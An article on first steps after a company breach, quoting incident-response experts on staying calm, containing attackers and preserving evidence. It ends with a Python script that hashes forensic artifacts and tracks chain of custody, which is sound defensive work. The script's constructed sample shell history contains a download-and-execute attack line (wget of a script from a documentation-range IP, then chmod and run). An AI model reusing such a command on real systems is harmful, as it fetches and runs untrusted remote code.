Your company just got hacked. Now what?
According to a cybercrime expert who specializes in data breaches and incident response, the first step is keeping the CISO and the IT security staff calm. A high-impact cyber-attack can be a stressful and disorienting event, even for the most veteran technology and business executives.
Dario Forte was a police officer in Italy for 15 years, serving in various crime enforcement squads, including cybercrime enforcement. He is now founder and CEO of DF Labs in Crema, Italy, a firm specializing in information security, incident management, e-discovery, litigation support and digital forensics.
“The first step is definitely supporting the customer who is reporting the incident - in order to avoid panic,” says Forte.
Forte has extensive real-world experience as a cybersecurity first responder. He has 15 years' experience in the Italian military and financial police, and has worked in the United States with NASA and many federal agencies. In both countries, Forte has managed information security strategies and led incident management and digital investigations. He currently serves as Chief of Delegation, Subject Matter Expert and Co-Editor for the Italian delegation to the ISO standards on digital evidence and investigations, and on incident management.
When asked whether his experience as a police officer carries over to cyber incident response, Forte says yes. “I've spent over 15 years in the police, working in drug and then organized crime enforcement for 10 years. The first thing they teach you is: don't panic. If you cannot keep calm, things will only get worse.”
“The CISOs we usually talk with have four priority questions to answer about incident response,” says Forte. He explains:
- What is happening?
- How can I prioritize my response?
- How can I contain the damage?
- Has this occurred elsewhere?
Forte continues: “The answers to these questions can be given only by a structured approach, where a well-prepared Incident Management Team can orchestrate the investigation and response, sharing the artifacts with their trusted peers in order to reduce the reaction time.”
After the first interaction, when he helps to keep heads level, Forte explains the next step. “We ask if they've been notified of any information that has been disclosed to unauthorized parties, stolen, deleted or corrupted. That will help us to understand the incident scope, its potential impact and the customer's ability to govern it. From a technical standpoint, our team immediately engages in a conference call with the technical staff at the customer site. Usually that happens no later than 45 minutes from the first call. This phase is fundamental, as it gives us an immediate sense of which information is available for investigation and/or helps the customer avoid any mistake in evidence handling. The latter is the most common cause of failure in the investigation and in the response to the incident.”
Reg Harnish, Founder and CEO at GreyCastle Security
Forte makes a crucial point about the importance of securing the (cyber) crime scene.
Brian Minick, former CISO at GE Aviation and Energy, a Fortune 500 corporation, agrees. “When a client discovers they've had a breach, there is often a mistaken assumption that the scope of the breach is fairly static,” says Minick, now CEO at Morphick, a cybersecurity professional services firm in Cincinnati. “In reality, the intrusion usually starts weeks or months before detection, and the intruder likely has broad access to the client's network and can move around it quickly. The Morphick Incident Response Team's first priority with a client is to rapidly identify and disrupt the attacker's access to the client's networks and data to mitigate further losses. Preserving evidence and identifying the perpetrators is important, but the investigation can't begin until the crime scene is secured.”
It seems cybercrime response is a lot like street crime response. Another cyber expert confirms that thought. Ondrej Krehel, managing director and founder at LIFARS, LLC, a New York City digital forensics and cybersecurity intelligence firm that provides data breach incident response, chimes in with his best practices for first-responder work. “The primary objective is to provide intelligence about the technical skill-set and the motivation of the attacker, along with immediate steps to remediate and protect critical assets.”
Krehel goes on to say, “We holistically examine the situation to address the incident. This includes initial damage assessment, initial vector of compromise, indicators of compromise, preservation of forensic artifacts, and further forensic analysis of information collected.”
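Both Forte and Krehel stress preserving forensic artifacts, and Forte names mistakes in evidence handling as the most common cause of a failed investigation. The script below is an added example, not code from DF Labs, Morphick or LIFARS: it shows the minimum a first responder does to make evidence defensible, hashing each artifact at acquisition, opening a chain-of-custody log, and later re-verifying the copies so that any change after acquisition (here, a constructed case of someone "cleaning up" a shell history) is detected rather than silently carried into the analysis. The artifact contents, the case ID, the people named and the IP address (from the 203.0.113.0/24 documentation range) are all constructed for the example.

```python
import hashlib
import json
import os
import shutil
import tempfile
from datetime import datetime, timezone

# Constructed sample artifacts for the example (not real evidence). They are written to a
# scratch directory so the script runs offline; in practice the paths would point at files
# copied off the compromised host under a write-blocker or carved from a disk/memory image.
SAMPLE_ARTIFACTS = {
    "auth.log": "Mar  3 02:14:07 web01 sshd[4121]: Accepted password for root "
                "from 203.0.113.45 port 51822 ssh2\n",
    "bash_history": "wget http://203.0.113.45/x.sh -O /tmp/x.sh\nchmod +x /tmp/x.sh\n/tmp/x.sh\n",
}


def write_sample_artifacts(base_dir):
    """Materialise the constructed artifacts on disk and return their paths."""
    paths = []
    for name, content in SAMPLE_ARTIFACTS.items():
        path = os.path.join(base_dir, name)
        with open(path, "w") as fh:
            fh.write(content)
        paths.append(path)
    return paths


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large images do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(paths, case_id, collector):
    """Hash every artifact at acquisition time and open the chain-of-custody log."""
    acquired_at = datetime.now(timezone.utc).isoformat()
    return {
        "case_id": case_id,
        "artifacts": [
            {"name": os.path.basename(p), "size": os.path.getsize(p), "sha256": sha256_file(p)}
            for p in paths
        ],
        "custody": [{"event": "acquired", "by": collector, "at": acquired_at}],
    }


def record_transfer(manifest, from_person, to_person):
    """Append a hand-off to the custody log; the artifact hashes are never rewritten."""
    manifest["custody"].append({
        "event": "transferred",
        "from": from_person,
        "to": to_person,
        "at": datetime.now(timezone.utc).isoformat(),
    })
    return manifest


def verify_manifest(manifest, base_dir):
    """Return the names of artifacts that are missing or whose hash no longer matches."""
    mismatches = []
    for entry in manifest["artifacts"]:
        path = os.path.join(base_dir, entry["name"])
        if not os.path.isfile(path) or sha256_file(path) != entry["sha256"]:
            mismatches.append(entry["name"])
    return mismatches


def run_demo():
    """Acquire, hand off, then show that a later 'clean-up' of an artifact is detected."""
    base_dir = tempfile.mkdtemp(prefix="ir-evidence-")
    try:
        paths = write_sample_artifacts(base_dir)
        manifest = build_manifest(paths, case_id="CASE-0001", collector="first responder")
        before = verify_manifest(manifest, base_dir)   # [] : copies match the manifest
        record_transfer(manifest, "first responder", "forensic analyst")
        # Someone truncating the shell history after acquisition is exactly the kind of
        # evidence-handling mistake the article warns about; the hash check exposes it.
        with open(os.path.join(base_dir, "bash_history"), "w") as fh:
            fh.write("")
        after = verify_manifest(manifest, base_dir)    # ['bash_history']
        return {"before": before, "after": after, "custody": manifest["custody"],
                "manifest_json": json.dumps(manifest, indent=2)}
    finally:
        shutil.rmtree(base_dir, ignore_errors=True)


if __name__ == "__main__":
    result = run_demo()
    print(result["manifest_json"])
    print("tampered or missing artifacts:", result["after"])
```

The manifest is written once, at acquisition, and only the custody log grows afterwards; analysts work on verified copies and re-run the check before relying on a file. In a real engagement the manifest itself would also be hashed and signed (or stored somewhere the responders cannot alter) so that the reference values are as trustworthy as the artifacts they describe.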